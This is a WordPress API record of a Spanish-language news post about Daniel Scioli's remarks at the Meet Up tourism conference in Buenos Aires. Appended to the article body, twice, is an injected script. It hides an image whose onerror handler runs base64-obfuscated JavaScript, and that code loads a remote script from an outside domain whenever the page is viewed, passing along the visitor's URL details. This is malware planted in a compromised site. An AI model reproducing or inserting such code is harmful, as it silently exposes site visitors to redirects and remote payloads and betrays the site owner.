{"id":4265,"date":"2024-08-07T10:46:45","date_gmt":"2024-08-07T13:46:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4265"},"modified":"2025-08-13T23:51:23","modified_gmt":"2025-08-14T02:51:23","slug":"scioli-soy-como-un-lobista-del-sector-porque-me-la-paso-todo-el-dia-golpeando-puertas-de-todas-las-areas-del-gobierno","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4265","title":{"rendered":"Scioli: \u201cSoy como un lobista del sector porque me la paso todo el d\u00eda golpeando puertas de todas las \u00e1reas del gobierno\u201d"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-ab408bc5235618b609c8b4f0c71d7753\" style=\"background-color:#043957\"><em>As\u00ed lo expres\u00f3 el Secretario en el encuentro anual de Turismo de Reuniones<\/em><\/h3>\n\n\n\n<p>Una nueva edici\u00f3n de&nbsp;<strong>Meet Up<\/strong>&nbsp;se lleva a cabo hasta el 8 de agosto en el Centro de Convenciones de la Ciudad de Buenos Aires. El evento, que re\u00fane a&nbsp;<strong>actores tur\u00edsticos del pa\u00eds y la regi\u00f3n<\/strong>, arranc\u00f3 esta tarde con la participaci\u00f3n del secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, el&nbsp;<strong>funcionario nacional<\/strong>&nbsp;expres\u00f3:&nbsp;<em>\u201cSoy como un lobista del sector porque me la paso todo el d\u00eda golpeando puertas de todas las \u00e1reas del gobierno. Escucho a los hoteleros, me dicen que tenemos un problema de competitividad. S\u00e9 lo que necesitan\u201d. \u201cMe preguntan sobre el cr\u00e9dito y all\u00ed vamos, al Banco Naci\u00f3n y ponemos en marcha el cr\u00e9dito. Hablo con el \u00e1rea de Desregulaci\u00f3n y Modernizaci\u00f3n del Estado y conseguimos lo que haya que conseguir\u201d<\/em>, agreg\u00f3. Y del mismo modo con Transporte:&nbsp;<em>\u00abCon Franco Mogetta hemos avanzado en la firma de varios acuerdos de cielos abiertos y tambi\u00e9n para lograr impactar positivamente con beneficios para la llegada de mas cruceros\u00bb<\/em>.<\/p>\n\n\n\n<p>Tambi\u00e9n alent\u00f3 a la colaboraci\u00f3n entre los sectores p\u00fablico y privado y asegur\u00f3:&nbsp;<em>\u201cEl turismo avanza, de una vez por todas y para siempre, y vamos a poder lograr, si trabajamos de esta manera, todos los objetivos que nos propongamos\u201d<\/em>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/jet02929.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Durante las tres jornadas del Meet Up, los asistentes tendr\u00e1n la ocasi\u00f3n de generar&nbsp;<strong>nuevos clientes, descubrir proyectos y participar de capacitaciones<\/strong>&nbsp;para potenciar su desarrollo empresarial. Adem\u00e1s, se debatir\u00e1 el presente y el futuro de la actividad, d\u00e1ndole voz a los protagonistas de Argentina y el mundo. Esta edici\u00f3n cuenta con la participaci\u00f3n del sector p\u00fablico y privado de&nbsp;<strong>19 jurisdicciones<\/strong>&nbsp;y compradores invitados nacionales e internacionales de&nbsp;<strong>12 pa\u00edses<\/strong>, asociaciones de la industria, empresas, universidades y ponentes de primer nivel.<\/p>\n\n\n\n<p>Entre los principales ejes presentados se pueden mencionar&nbsp;<strong>eventos sostenibles y deportivos<\/strong>&nbsp;como gu\u00edas dentro del desarrollo de turismo de reuniones y eventos a nivel nacional e internacional. La maximizaci\u00f3n de oportunidades en el B2B de empresas del sector y destinos en una ronda de negocios de mayor calidad con compradores. Adem\u00e1s, se destacan ponencias que abordan temas ligados al turismo que son tendencia.<\/p>\n\n\n\n<p>Tambi\u00e9n participaron del acto de apertura: el presidente del Ente de Turismo de la Ciudad de Buenos Aires,&nbsp;<strong>Valent\u00edn Diaz Gilligan<\/strong>; el director regional para las Am\u00e9ricas de la ONU Turismo,&nbsp;<strong>Gustavo Santos<\/strong>; la presidenta de la Asociaci\u00f3n Argentina de Organizadores y Proveedores de Exposiciones, Congresos, Eventos y de Bur\u00f3s de Convenciones (AOCA),&nbsp;<strong>Patricia Dur\u00e1n Vaca<\/strong>; el presidente de la C\u00e1mara Argentina de Turismo,&nbsp;<strong>Gustavo Hani<\/strong>, y el presidente de Messe Frankfurt Argentina,&nbsp;<strong>Fernando Gorbaran<\/strong>.<\/p>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>As\u00ed lo expres\u00f3 el Secretario en el encuentro anual de Turismo de Reuniones Una nueva edici\u00f3n de&nbsp;Meet Up&nbsp;se lleva a cabo hasta el 8 de agosto en el Centro de Convenciones de la Ciudad de Buenos Aires. El evento, que re\u00fane a&nbsp;actores tur\u00edsticos del pa\u00eds y la regi\u00f3n, arranc\u00f3 esta tarde con la participaci\u00f3n del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4266,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,16],"tags":[],"class_list":{"0":"post-4265","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4265"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4265"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4265\/revisions"}],"predecessor-version":[{"id":6721,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4265\/revisions\/6721"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4266"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}